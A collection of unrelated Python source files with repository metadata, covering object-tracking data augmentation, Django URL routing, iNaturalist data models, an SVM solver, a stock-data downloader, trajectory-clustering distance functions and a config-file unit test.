def _shuffle(self):
"""
random shuffel
"""
pick = []
m = 0
while m < self.num:
p = []
for subset in self.train_datas:
sub_p = subset.pick
p += sub_p
sample_random.shuffle(p)
pick += p
m = len(pick)
self.pick = pick
print("dataset length {}".format(self.num))
def _choose_dataset(self, index):
for dataset in self.train_datas:
if dataset.start + dataset.num > index:
return dataset, index - dataset.start
def _toBBox(self, image, shape):
imh, imw = image.shape[:2]
if len(shape) == 4:
w, h = shape[2] - shape[0], shape[3] - shape[1]
else:
w, h = shape
context_amount = 0.5
exemplar_size = self.template_size
wc_z = w + context_amount * (w + h)
hc_z = h + context_amount * (w + h)
s_z = np.sqrt(wc_z * hc_z)
scale_z = exemplar_size / s_z
w = w * scale_z
h = h * scale_z
cx, cy = imw // 2, imh // 2
bbox = center2corner(Center(cx, cy, w, h))
return bbox
def _crop_hwc(self, image, bbox, out_sz, padding=(0, 0, 0)):
"""
crop image
"""
bbox = [float(x) for x in bbox]
a = (out_sz - 1) / (bbox[2] - bbox[0])
b = (out_sz - 1) / (bbox[3] - bbox[1])
c = -a * bbox[0]
d = -b * bbox[1]
mapping = np.array([[a, 0, c],
[0, b, d]]).astype(np.float)
crop = cv2.warpAffine(image, mapping, (out_sz, out_sz), borderMode=cv2.BORDER_CONSTANT, borderValue=padding)
return crop
def _posNegRandom(self):
"""
random number from [-1, 1]
"""
return random.random() * 2 - 1.0
# ------------------------------------
# function for data augmentation
# ------------------------------------
def _augmentation_template(self, image, bbox, size):
"""
data augmentation for input pairs , color aug already have
"""
shape = image.shape
crop_bbox = center2corner((shape[0] // 2, shape[1] // 2, size, size))
param = edict()
param.shift = (self._posNegRandom() * self.shift_template, self._posNegRandom() * self.shift_template) # shift
param.scale = ((1.0 + self._posNegRandom() * self.scale_template), (1.0 + self._posNegRandom() * self.scale_template)) # scale change
crop_bbox, _ = aug_apply(Corner(*crop_bbox), param, shape)
x1, y1 = crop_bbox.x1, crop_bbox.y1
bbox = BBox(bbox.x1 - x1, bbox.y1 - y1, bbox.x2 - x1, bbox.y2 - y1)
scale_x, scale_y = param.scale
bbox = Corner(bbox.x1 / scale_x, bbox.y1 / scale_y, bbox.x2 / scale_x, bbox.y2 / scale_y)
image = self._crop_hwc(image, crop_bbox, size) # shift and scale
if self.blur > random.random():
image = gaussian_filter(image, sigma=(1, 1, 0))
image = self.transform_extra(image) # other data augmentation
return image, bbox, param
def _augmentation_search(self, image, bbox, size):
"""
data augmentation for input pairs , color aug already have
"""
shape = image.shape
crop_bbox = center2corner((shape[0] // 2, shape[1] // 2, size, size))
param = edict()
param.shift = (self._posNegRandom() * self.shift_search, self._posNegRandom() * self.shift_search) # shift
param.scale = ((1.0 + self._posNegRandom() * self.scale_search), (1.0 + self._posNegRandom() * self.scale_search)) # scale change
crop_bbox, _ = aug_apply(Corner(*crop_bbox), param, shape)
x1, y1 = crop_bbox.x1, crop_bbox.y1
bbox = BBox(bbox.x1 - x1, bbox.y1 - y1, bbox.x2 - x1, bbox.y2 - y1)
scale_x, scale_y = param.scale
bbox = Corner(bbox.x1 / scale_x, bbox.y1 / scale_y, bbox.x2 / scale_x, bbox.y2 / scale_y)
image = self._crop_hwc(image, crop_bbox, size) # shift and scale
if self.blur > random.random():
image = gaussian_filter(image, sigma=(1, 1, 0))
image = self.transform_extra(image) # other data augmentation
return image, bbox, param
# ------------------------------------
# function for anchors and labels
# ------------------------------------
def _pair_anchors(self, center, score_size):
"""
anchors corresponding to pairs
:param center: center of search image
:param score_size: output score size after cross-correlation
:return: anchors not corresponding to ground truth
"""
a0x = center - score_size // 2 * self.stride
ori = np.array([a0x] * 4, dtype=np.float32)
zero_anchors = self.anchors_naive + ori
x1 = zero_anchors[:, 0]
y1 = zero_anchors[:, 1]
x2 = zero_anchors[:, 2]
y2 = zero_anchors[:, 3]
x1, y1, x2, y2 = map(lambda x: x.reshape(self.anchor_nums, 1, 1), [x1, y1, x2, y2])
cx, cy, w, h = corner2center([x1, y1, x2, y2])
disp_x = np.arange(0, score_size).reshape(1, 1, -1) * self.stride
disp_y = np.arange(0, score_size).reshape(1, -1, 1) * self.stride
cx = cx + disp_x
cy = cy + disp_y
zero = np.zeros((self.anchor_nums, score_size, score_size), dtype=np.float32)
cx, cy, w, h = map(lambda x: x + zero, [cx, cy, w, h])
x1, y1, x2, y2 = center2corner([cx, cy, w, h])
self.anchorsPairs = np.stack([x1, y1, x2, y2]), np.stack([cx, cy, w, h])
def _naive_anchors(self, cfg):
"""
anchors corresponding to score map
"""
self.anchors_naive = np.zeros((self.anchor_nums, 4), dtype=np.float32)
size = self.stride * self.stride
count = 0
for r in cfg.SIAMRPN.TRAIN.ANCHORS_RATIOS:
ws = int(math.sqrt(size*1. / r))
hs = int(ws * r)
for s in cfg.SIAMRPN.TRAIN.ANCHORS_SCALES:
w = ws * s
h = hs * s
self.anchors_naive[count][:] = [-w*0.5, -h*0.5, w*0.5, h*0.5][:]
count += 1
def _anchor_target(self, target, pos_keep=16, all_keep=64, thr_high=0.6, thr_low=0.3,neg=False):
cls = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.int64)
cls[...] = -1 # -1 ignore 0 negative 1 positive
delta = np.zeros((4, self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
delta_weight = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
tcx, tcy, tw, th = corner2center(target)
anchor_box = self.anchorsPairs[0]
anchor_center = self.anchorsPairs[1]
x1, y1, x2, y2 = anchor_box[0], anchor_box[1], anchor_box[2], anchor_box[3]
cx, cy, w, h = anchor_center[0], anchor_center[1], anchor_center[2], anchor_center[3]
# delta
delta[0] = (tcx - cx) / w
delta[1] = (tcy - cy) / h
delta[2] = np.log(tw / (w + eps) + eps)
delta[3] = np.log(th / (h + eps) + eps)
# IoU
overlap = IoU([x1, y1, x2, y2], target)
pos = np.where(overlap > thr_high)
neg = np.where(overlap < thr_low)
pos, pos_num = self._select(pos, pos_keep)
neg, neg_num = self._select(neg, all_keep - pos_num)
cls[pos] = 1
w_temp = 1. / (pos_num + 1e-6) # fix bugs here
delta_weight[pos] = w_temp
cls[neg] = 0
return cls, delta, delta_weight
# def _anchor_target(self,target, pos_keep=16, all_keep=64, thr_high=0.6, thr_low=0.3):
# label_cls = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.int64)
# label_cls[...] = -1 # -1 ignore 0 negative 1 positive
# label_cls_next = np.ones_like(label_cls) * (-1)
# delta = np.zeros((4, self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
# delta_weight = np.zeros((self.anchor_nums, self.score_size, self.score_size), dtype=np.float32)
#
# tcx, tcy, tw, th = corner2center(target)
#
#
# anchor_box = self.anchorsPairs[0]
# anchor_center = self.anchorsPairs[1]
# x1, y1, x2, y2 = anchor_box[0], anchor_box[1], anchor_box[2], anchor_box[3]
# cx, cy, w, h = anchor_center[0], anchor_center[1], anchor_center[2], anchor_center[3]
#
#
# # delta
# delta[0] = (tcx - cx) / w
# delta[1] = (tcy - cy) / h
# delta[2] = np.log(tw / (w + eps) + eps)
# delta[3] = np.log(th / (h + eps) + eps)
#
# # IoU
# overlap = IoU([x1, y1, x2, y2], target)
# pos = np.where(overlap > thr_high)
# neg = np.where(overlap < thr_low)
#
# #label
# label_cls[pos] = 1
# label_cls[neg] = 0
# pos_c, pos_num = self._select(pos, pos_keep)
# neg_c, neg_num = self._select(neg, all_keep - pos_num)
#
# label_cls_next[pos_c] = 1
# w_temp = 1. / (pos_num + 1e-6) # fix bugs here
# delta_weight[pos_c] = w_temp
#
# label_cls_next[neg_c] = 0
#
# return label_cls, delta, delta_weight,label_cls_next
def _select(self, position, keep_num=16):
"""
select pos and neg anchors to balance loss
"""
num = position[0].shape[0]
if num <= keep_num:
return position, num
slt = np.arange(num)
np.random.shuffle(slt)
slt = slt[:keep_num]
return tuple(p[slt] for p in position), keep_num
def _dynamic_label(self, fixedLabelSize, c_shift, labelWeight='balanced', rPos=2, rNeg=0):
if isinstance(fixedLabelSize, int):
fixedLabelSize = [fixedLabelSize, fixedLabelSize]
assert (fixedLabelSize[0] % 2 == 1)
if labelWeight == 'balanced':
d_label = self._create_dynamic_logisticloss_label(fixedLabelSize, c_shift, rPos, rNeg)
else:
logger.error('TODO or unknown')
return d_label
def _create_dynamic_logisticloss_label(self, label_size, c_shift, rPos=2, rNeg=0):
if isinstance(label_size, int):
sz = label_size
else:
sz = label_size[0]
# the real shift is -param['shifts']
sz_x = sz // 2 + round(-c_shift[0]) // 8 # 8 is strides
sz_y = sz // 2 + round(-c_shift[1]) // 8
x, y = np.meshgrid(np.arange(0, sz) - np.floor(float(sz_x)),
np.arange(0, sz) - np.floor(float(sz_y)))
dist_to_center = np.abs(x) + np.abs(y) # Block metric
label = np.where(dist_to_center <= rPos,
np.ones_like(y),
np.where(dist_to_center < rNeg,
0.5 * np.ones_like(y),
np.zeros_like(y)))
return label
| UTF-8 | Python | false | false | 16,349 | py | 198 | siamrpn.py | 27 | 0.551844 | 0.532085 | 0 | 437 | 36.398169 | 142 |
navill/2-1_Project_repo | 17,265,768,546,824 | 7b3c0dd77b16898f8cc3274f14c5d0c40cc5673c | 280f650e91c675f471121b8a4a13c2bb5a0a5e6c | /apps/config/urls.py | 376ae4c5e9a9968770ab098b6787cd368433759f | []
| no_license | https://github.com/navill/2-1_Project_repo | a8e089c657e44034152df30a85220675f2c31084 | 3f62bca9f52799d9f877f2d01259bb51038c0cc4 | refs/heads/master | 2022-12-31T18:32:45.471261 | 2020-10-26T10:54:39 | 2020-10-26T10:54:39 | 303,907,042 | 0 | 0 | null | false | 2020-10-26T10:54:40 | 2020-10-14T04:57:03 | 2020-10-19T13:47:14 | 2020-10-26T10:54:39 | 44 | 0 | 0 | 1 | Python | false | false | from django.contrib import admin
from django.urls import path, include
from accounts.views.staff_view import list_staff_user
from accounts.views.views import create_normal_user, list_normal_user, login_view, logout_view
urlpatterns = [
path('admin/', admin.site.urls, name='admin'),
path('create/', create_normal_user, name='create_user'),
path('login/', login_view, name='login'),
path('logout/', logout_view, name='logout'),
path('normal/', list_normal_user, name='list_normal'),
path('staff/', list_staff_user, name='list_staff'),
path('accounts/', include('accounts.urls', namespace='accounts')),
path('accounts-api/', include('accounts.api.urls', namespace='accounts_api')),
]
| UTF-8 | Python | false | false | 717 | py | 21 | urls.py | 18 | 0.694561 | 0.694561 | 0 | 17 | 41.176471 | 94 |
N-e1/pyinaturalist | 8,581,344,701,238 | 64798a9aa5574c8095e60b6db83c9ba08ebf0154 | 450cc0c4c36cdc2bf18b93bd0d03e864b43ef7c9 | /pyinaturalist/models/observation_field.py | 33a0449eb5341f6a5cf57ca693584c679cabdd5f | [
"MIT"
]
| permissive | https://github.com/N-e1/pyinaturalist | 2ed8f0ae7760c7f4e9eeacff738e680bdaba3183 | 3bcbc5187514733947e6385108fdcb5dafc2a4f8 | refs/heads/main | 2023-04-25T18:31:11.884578 | 2021-06-08T23:52:39 | 2021-06-08T23:52:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from datetime import date, datetime
from typing import List, Union
from attr import field
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_attr,
define_model,
kwarg,
)
from pyinaturalist.response_format import safe_split, try_int_or_float
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
'dna': str,
'date': date,
'datetime': datetime,
'numeric': try_int_or_float,
'taxon': int,
'text': str,
'time': str,
}
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
"""A dataclass containing information about an observation field **definition**, matching the schema of
`GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
"""
allowed_values: List[str] = field(converter=safe_split, factory=list)
created_at: datetime = datetime_now_attr
datatype: str = kwarg # Enum
description: str = kwarg
id: int = kwarg
name: str = kwarg
updated_at: datetime = datetime_now_attr
user_id: int = kwarg
users_count: int = kwarg
uuid: str = kwarg
values_count: int = kwarg
@define_model
class ObservationFieldValue(BaseModel):
"""A dataclass containing information about an observation field **value**, matching the schema of ``ofvs``
from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
"""
datatype: str = kwarg # Enum
field_id: int = kwarg
id: int = kwarg
name: str = kwarg
taxon_id: int = kwarg
user_id: int = kwarg
uuid: str = kwarg
value: OFVValue = kwarg
# Lazy-loaded nested model objects
taxon: property = LazyProperty(Taxon.from_json)
user: property = LazyProperty(User.from_json)
# Unused attrbiutes
# name_ci: str = kwarg
# value_ci: int = kwarg
# Convert value by datatype
def __attrs_post_init__(self):
if self.datatype in OFV_DATATYPES and self.value is not None:
converter = OFV_DATATYPES[self.datatype]
self.value = converter(self.value)
| UTF-8 | Python | false | false | 2,182 | py | 32 | observation_field.py | 24 | 0.670486 | 0.670027 | 0 | 76 | 27.710526 | 111 |
boobpoop/SVM | 2,525,440,778,017 | af1541a9c7e660e293daa8ae41f275b29f8be0c2 | 402afeec0807beb709a4e7bcc00ed49965fb459a | /svm/Platt-SMO/Platt-SMO.py | f9e3abea458679a5fd2575f112750be91439b108 | []
| no_license | https://github.com/boobpoop/SVM | 5c0df957bcf37e18d479a700b0c29e4fff44e279 | b4acbaffdbbecac51aa21551672b22fd084047a0 | refs/heads/master | 2020-04-11T02:56:43.176337 | 2018-12-12T09:31:57 | 2018-12-12T09:31:57 | 161,462,284 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import random as rd
import matplotlib.pyplot as plt
import time
FILE_PATH = "testSet.txt"
class Data():
def load_data(self, path):
data_list = open(path, "r").readlines()
self.data = []
self.label = []
for data_line in data_list:
split_data = data_line.strip().split('\t')
self.data.append([float(split_data[0]), float(split_data[1])])
self.label.append(int(split_data[2]))
def list_to_mat(self):
self.data = np.mat(self.data)
self.label = np.mat(self.label).transpose()
return self.data, self.label
# Note that you must pass data about type of numpy.mat to these functions
# ensure data format is correct
class Platt_SMO():
def __init__(self, data, label, C, toler, max_iter):
self.data = data
self.label = label
self.C = C
self.toler = toler
self.max_iter = max_iter
self.b = 0
self.dim1, self.dim2 = data.shape
self.alpha = np.mat(np.zeros((self.dim1, 1)))
self.Ei_cache = np.mat(np.zeros((self.dim1, 2)))
def clip_alpha(self, i, LOW, HIGH):
if self.alpha[i] < LOW:
self.alpha[i] = LOW
elif self.alpha[i] > HIGH:
self.alpha[i] = HIGH
return self.alpha[i]
def calculate_Ei(self, i):
fxi = np.multiply(self.alpha, self.label).T * (self.data * self.data[i].T) + self.b
Ei = fxi - self.label[i]
return Ei
def select_rand_j(self, i):
j = i
while(j == i):
j = int(rd.uniform(0, self.dim1))
return j
def select_j(self, i, Ei):
self.Ei_cache[i] = [1, Ei]
max_delta_E = -1
max_index = -1
non_zero_index_array = np.nonzero(self.Ei_cache[:, 0] > 0)[0]
#print(non_zero_index_array)
if len(non_zero_index_array) > 0:
for j in range(self.max_iter):
if j == i:
continue
Ej = self.calculate_Ei(j)
if abs(Ei - Ej) > max_delta_E:
max_delta_E = abs(Ei - Ej)
max_index = j
best_Ej = Ej
return max_index, best_Ej
else:
j = self.select_rand_j(i)
Ej = calculate_Ei(j)
return j, Ej
def update_Ei(self, i):
Ei = self.calculate_Ei(i)
self.Ei_cache[i] = [i, Ei]
def update_alpha(self, i):
Ei = self.calculate_Ei(i)
if (self.label[i] * Ei < -self.toler and self.alpha[i] < self.C) or (self.label[i] * Ei > self.toler and self.alpha[i] > 0):
j, Ej = self.select_j(i, Ei)
alpha_i_old = self.alpha[i].copy()
alpha_j_old = self.alpha[j].copy()
if self.label[i] != self.label[j]:
L = max(0, alpha_j_old - alpha_i_old)
H = min(self.C, self.C + alpha_j_old - alpha_i_old)
else:
L = max(0, alpha_j_old + alpha_i_old - self.C)
H = min(self.C, alpha_j_old + alpha_i_old)
if L == H:
return 0
divisor = self.data[i] * self.data[i].T + self.data[j] * self.data[j].T - 2.0 * self.data[i] * self.data[j].T
if divisor <= 0:
return 0
self.alpha[j] += self.label[j] * (Ei - Ej) / divisor
self.alpha[j] = self.clip_alpha(j, L, H)
self.update_Ei(j)
if abs(self.alpha[j] - alpha_j_old) < 0.00001:
return 0
self.alpha[i] += self.label[i] * self.label[j] * (alpha_j_old - self.alpha[j])
self.update_Ei(i)
bi = self.b - Ei - self.label[i] * (self.data[i] * self.data[i].T) * (self.alpha[i] - alpha_i_old) - self.label[j] * (self.data[i] * self.data[j].T) * (self.alpha[j] - alpha_j_old)
bj = self.b - Ej - self.label[i] * (self.data[i] * self.data[j].T) * (self.alpha[i] - alpha_i_old) - self.label[j] * (self.data[j] * self.data[j].T) * (self.alpha[j] - alpha_j_old)
if (0 < self.alpha[i]) and (self.alpha[i] < self.C):
self.b = bi
elif (0 < self.alpha[j]) and (self.alpha[j] < self.C):
self.b = bj
else:
self.b = (bi + bj) / 2.0
return 1
else:
return 0
def SMO(self):
iter = 0
travel_all_data = True
alpha_is_changed = False
while(iter < self.max_iter) and (alpha_is_changed or travel_all_data):
alpha_is_changed = False
if travel_all_data:
for i in range(self.dim1):
alpha_is_changed += self.update_alpha(i)
#print("iter = %d, i = %d, alpha_is_changed = %d" %(iter, i, alpha_is_changed))
iter += 1
else:
non_zero_index_array = np.nonzero(np.multiply((self.alpha > 0), (self.alpha < self.C)))[0]
#print(non_zero_index_array)
for i in non_zero_index_array:
alpha_is_changed += self.update_alpha(i)
#print("iter = %d, i = %d, alpha_is_changed = %d" %(iter, i , alpha_is_changed))
iter += 1
if travel_all_data:
travel_all_data = False
elif not alpha_is_changed:
travel_all_data = True
print("iter = %d" %(iter))
return self.alpha, self.b
def visualize(self):
xcord_1 = []
ycord_1 = []
xcord1 = []
ycord1 = []
for i in range(self.dim1):
if self.label[i] == -1:
xcord_1.append(self.data[i, 0])
ycord_1.append(self.data[i, 1])
else:
xcord1.append(self.data[i, 0])
ycord1.append(self.data[i, 1])
plt.switch_backend("agg")
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(xcord_1, ycord_1, s = 30, c = "red", marker = "o", alpha = 1, label = "-1")
ax.scatter(xcord1, ycord1, s = 30, c = "blue", marker = "+", alpha = 1, label = "1")
weight_matrix = np.multiply(np.tile(np.multiply(self.alpha, self.label) , (1, self.dim2)), self.data)
weight = weight_matrix.sum(axis = 0).tolist()[0]
print(weight)
print(b)
x = np.arange(2.0, 8.0, 0.1)
y = -(weight[0] * x + float(b)) / weight[1]
ax.plot(x, y)
ax.set_xlabel("x1")
ax.set_ylabel("x2")
plt.legend()
plt.savefig("data_visualize2.png")
plt.close()
if __name__ == "__main__":
start = time.time()
data = Data()
data.load_data(FILE_PATH)
data, label = data.list_to_mat()
ps = Platt_SMO(data, label, 0.6, 0.001, 40)
alpha, b = ps.SMO()
ps.visualize()
end = time.time()
print(end - start)
#print(b)
#print(alpha[alpha > 0])
| UTF-8 | Python | false | false | 6,959 | py | 5 | Platt-SMO.py | 2 | 0.489438 | 0.475212 | 0 | 186 | 36.413978 | 192 |
CoderDream/Algorithmic-Trading-Tutorial | 2,817,498,592,563 | 68bba440b64655ab783e49ef557349a3860db070 | 2ae09be65f5ac40ace5b11352f9c79d9824b70e8 | /01. Programs/Tutorial 04 CN - Get intraday.py | 574b2d274fa90429775ce85f78d93a3dd1663b68 | []
| no_license | https://github.com/CoderDream/Algorithmic-Trading-Tutorial | 05d49503c327629886fb83ee023e9d16128e9eb3 | 57b6d0c8af0cb6e818fd0dcd6ad89c92a16f6b9a | refs/heads/master | 2020-08-13T21:40:44.725775 | 2019-10-14T16:38:17 | 2019-10-14T16:38:17 | 215,042,112 | 0 | 0 | null | true | 2019-10-14T12:46:26 | 2019-10-14T12:46:26 | 2019-10-06T13:44:43 | 2018-08-30T15:44:40 | 2,161 | 0 | 0 | 0 | null | false | false | import tushare
import pandas
import datetime
import os
def stockPriceIntraday(ticker, folder):
# Step 1. Get intraday data online
intraday = tushare.get_hist_data(ticker, ktype='5')
# Step 2. If the history exists, append
file = folder + '/' + ticker + '.csv'
if os.path.exists(file):
history = pandas.read_csv(file, index_col=0)
intraday.append(history)
# Step 3. Inverse based on index
intraday.sort_index(inplace=True)
intraday.index.name = 'timestamp'
# Step 4. Save
intraday.to_csv(file)
print('Intraday for [' + ticker + '] got.')
# Step 1. Get tickers online
tickersRawData = tushare.get_stock_basics()
tickers = tickersRawData.index.tolist()
# Step 2. Save the ticker list to a local file
dateToday = datetime.datetime.today().strftime('%Y%m%d')
file = '../02. Data/00. TickerListCN/TickerList_' + dateToday + '.csv'
tickersRawData.to_csv(file)
print('Tickers saved.')
# Step 3. Get stock price (intraday) for all
for i, ticker in enumerate(tickers):
try:
print('Intraday', i, '/', len(tickers))
stockPriceIntraday(ticker, folder='../02. Data/01. IntradayCN')
except:
pass
print('Intraday for all stocks got.')
| UTF-8 | Python | false | false | 1,220 | py | 355 | Tutorial 04 CN - Get intraday.py | 2 | 0.668033 | 0.654098 | 0 | 43 | 27.372093 | 71 |
iyashikagoyal/Data-Science | 15,874,199,148,054 | 0b1d97c0bb57ba8531eb4b3ca85776777ef4b5b0 | b05422c89f37121fa5b7acc3198c477375465d97 | /DataCleaningAndAnalysis/query.py | 29dcc22074d436954e3f69c249cdecdb3195efe3 | []
| no_license | https://github.com/iyashikagoyal/Data-Science | f6beea90a2759b06d659a1a0ac698b389b26cb3c | cacf8fe0c16cb05e0ebe6fc9508e29004be7d4b3 | refs/heads/master | 2021-05-02T16:17:54.756621 | 2018-06-27T03:09:13 | 2018-06-27T03:09:13 | 120,672,232 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
class_file = open(sys.argv[1],"r").read()
def q1():
count = 0
courseslist = list()
courses = list()
count = dict()
number_of_courses = 0
l1 = class_file.strip().split("\n")
for line in l1:
courseslist.append(line.split("-")[1].strip())
for c in courseslist:
courses.append(c.split("|"))
for course in courses:
for c1 in course:
count[c1] = count.get(c1, 0) + 1
for k in count:
number_of_courses = number_of_courses + 1
return number_of_courses
def q2(prof):
if "," in prof:
prof = prof.split(",")[0].strip().lower()
else:
prof = prof.split()[len(prof.split())-1].strip().lower()
l1 = class_file.strip().split("\n")
for x1 in l1:
prof_course = x1.split("-")
if (prof_course[0].strip() == prof):
c = prof_course[1].strip().split("|")
return ("|".join(c))
def word_jaccard(a,b):
union = set(a.split()).union(set(b.split()))
intersection = set(a.split()).intersection(set(b.split()))
return float(len(intersection)/len(union))
def q3():
l1 = class_file.strip().split("\n")
dct = dict()
professorcourses = dict()
a = 0.0
for line in l1:
course = list()
prof_course = line.split("-")
course = prof_course[1].split("|")
dct[prof_course[0]] = len(course)
for k in dct:
if dct[k]>=5:
for line in l1:
x = line.split("-")
if (k == x[0]):
professorcourses[k] = x[1]
for key1 in professorcourses:
s1 = professorcourses[key1]
for key2 in professorcourses:
s2 = professorcourses[key2]
if not (s1 == s2):
if (a < word_jaccard(s1,s2)):
a = word_jaccard(s1,s2)
prof1 = key1
prof2 = key2
return (prof1 + "and " + prof2)
print("Number of courses : " + str(q1()))
print(q2(sys.argv[2]))
print(q3())
| UTF-8 | Python | false | false | 2,028 | py | 28 | query.py | 20 | 0.512327 | 0.485207 | 0 | 78 | 25 | 64 |
mainissues/TRACLUS_IMPLEMENTATION | 9,053,791,092,578 | 50ebc0efa37d1def307599857d1263aff154d1e5 | f5983701c7fda9cb56420e8d13343ee2a07a98d5 | /traclus-api/app/api/algorithm_api/base/distance_functions.py | 3156c8be490aada0064c2f8eb6773a74283bc4e0 | [
"MIT"
]
| permissive | https://github.com/mainissues/TRACLUS_IMPLEMENTATION | 03926ea0a06655b6332ecb96f980e7bc3fa3a550 | 9f4443f96a06bddf69854584bc2f53589956bc12 | refs/heads/master | 2023-03-27T14:47:57.677894 | 2022-04-25T14:31:57 | 2022-04-25T14:31:57 | 230,099,474 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
# 确定长短线段
def determine_longer_and_shorter_lines(line_a, line_b):
if line_a.length < line_b.length:
return line_b, line_a
else:
return line_a, line_b
def get_total_distance_function(perp_dist_func, angle_dist_func, parrallel_dist_func):
def __dist_func(line_a, line_b, perp_func=perp_dist_func, angle_func=angle_dist_func,
parr_func=parrallel_dist_func):
return perp_func(line_a, line_b) + angle_func(line_a, line_b) + parr_func(line_a, line_b)
return __dist_func
# 计算两条线段间的垂直距离
def perpendicular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
dist_a = shorter_line.start.distance_to_projection_on(longer_line)
dist_b = shorter_line.end.distance_to_projection_on(longer_line)
if dist_a == 0.0 and dist_b == 0.0:
return 0.0
return (dist_a * dist_a + dist_b * dist_b) / (dist_a + dist_b)
def __perpendicular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
dist_a = longer_line.line.project(shorter_line.start).distance_to(shorter_line.start)
dist_b = longer_line.line.project(shorter_line.end).distance_to(shorter_line.end)
if dist_a == 0.0 and dist_b == 0.0:
return 0.0
else:
return (math.pow(dist_a, 2) + math.pow(dist_b, 2)) / (dist_a + dist_b)
# 计算两条线段的夹角距离
def angular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
sine_coefficient = shorter_line.sine_of_angle_with(longer_line)
return abs(sine_coefficient * shorter_line.length)
# 两条线段水平距离
def parrallel_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
def __func(shorter_line_pt, longer_line_pt):
return shorter_line_pt.distance_from_point_to_projection_on_line_seg(longer_line_pt, longer_line)
return min([longer_line.dist_from_start_to_projection_of(shorter_line.start),
longer_line.dist_from_start_to_projection_of(shorter_line.end),
longer_line.dist_from_end_to_projection_of(shorter_line.start),
longer_line.dist_from_end_to_projection_of(shorter_line.end)])
# 到投影点的距离
def dist_to_projection_point(line, proj):
return min(proj.distance_to(line.start), proj.distance_to(line.end))
| UTF-8 | Python | false | false | 2,497 | py | 34 | distance_functions.py | 27 | 0.67746 | 0.671648 | 0 | 65 | 36.061538 | 105 |
mikexie360/UTD_CS | 11,063,835,785,286 | e53e9942b96d2ce6c27ccfec37bd7e902045ab1a | 09c976bf8d942bb30e284fff9f76db1845c2aa6a | /UTD_CS_6375/HW5/mlhw5/solution/p4.py | acec6febf9938ab16741e928ede544f5a506aa42 | []
| no_license | https://github.com/mikexie360/UTD_CS | 232d62ca992b43c8f4917f5525fc006fdc7132df | 23f7a6266841f6c25dd649d56060b961343869f7 | refs/heads/master | 2023-04-30T06:40:55.272767 | 2021-05-25T00:48:02 | 2021-05-25T00:48:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding:utf-8
import numpy as np
from copy import deepcopy
def import_data(fname):
fh = open(fname,'r')
content = fh.readlines()
fh.close()
X=[];Y=[]
for line in content:
values = line.strip().split(',')
X.append(values[0:-1])
Y.append(values[-1])
X= np.array(X,dtype='float').T
Y= np.array([Y],dtype='float')
# map labels to +- 1
Y = (Y-1.5)*2
return X,Y
class GuassianNaiveBayes:
def fit(self,X,Y):
self.rvX_Y = {}
self.rvY = {}
types = np.unique(Y)
_Y = Y[0]
for y in types:
self.rvY[y]=len(_Y[_Y==y])/float(Y.size)
M,N = X.shape
for i in range(M):
f_i = X[i,:]
for y in types:
selector = _Y==y
data = f_i[selector]
mu=np.mean(data)
sigma = np.sqrt(np.mean( (data-mu)**2 ))
self.rvX_Y[i,y]=(mu,sigma)
return
def predict(self,X):
M,N = X.shape
ret = np.zeros((1,N))
for i in range(N):
x_i=X[:,i]
type_prob = []
for y in self.rvY.keys():
prob = self.rvY[y]
for f in range(M):
mu,sigma=self.rvX_Y[f,y]
prob*=(1.0/(sigma*np.sqrt(2*np.pi)))*np.exp(-0.5*((x_i[f]-mu)/sigma)**2)
type_prob.append((y,prob))
type_prob.sort(key = lambda x:x[1],reverse=True)
ret[0,i]=type_prob[0][0]
return ret
def evaluate(self,X,Y):
tags = self.predict(X)
n_right = np.sum(tags == Y)
accuracy = float(n_right)/Y.size
return accuracy
if __name__ == '__main__':
X_tr,Y_tr = import_data('../sonar_train.data')
X_vd,Y_vd = import_data('../sonar_valid.data')
X_ts,Y_ts = import_data('../sonar_test.data')
gnb = GuassianNaiveBayes()
gnb.fit(X_tr,Y_tr)
print(gnb.evaluate(X_ts,Y_ts)) | UTF-8 | Python | false | false | 1,585 | py | 216 | p4.py | 190 | 0.58612 | 0.572871 | 0 | 69 | 21.985507 | 77 |
brl1906/twitterbot-dgs | 12,506,944,811,267 | e67bcb10cd2861a51371b8d989601550b8c1afe5 | b70591c38af95bb94e0c431fba0657e2d2122b94 | /tests/test_data.py | 4531726cb1dca1bba03de0e0d2216a3c671ab77f | []
| no_license | https://github.com/brl1906/twitterbot-dgs | 7f1afda7386038af7f6df12b507587c25574e5c2 | f6f4aff6b28f1aee7f3cafabde1b6962a10b7e96 | refs/heads/master | 2020-04-27T03:50:06.605750 | 2019-06-06T02:04:06 | 2019-06-06T02:04:06 | 146,484,249 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from configparser import ConfigParser
import os
import unittest
from data_handler import get_data
import pandas as pd
class TestConfigFileExistence(unittest.TestCase):
def setUp(self):
self.file = os.path.join(os.pardir, 'configuration', 'config.ini')
self.config = ConfigParser()
self.config.read(self.file)
self.section_names = ['api_key','api_secret','access_token',
'token_secret','datadotworld', 'data_files']
def tearDown(self):
pass
def test_configfile_existence(self):
self.assertEqual(os.path.join(os.pardir, 'configuration', 'config.ini'),
self.file)
def test_configfile_sections(self):
self.assertEqual(self.config.sections(), self.section_names)
class TestDataRetrieval(unittest.TestCase):
def setUp(self):
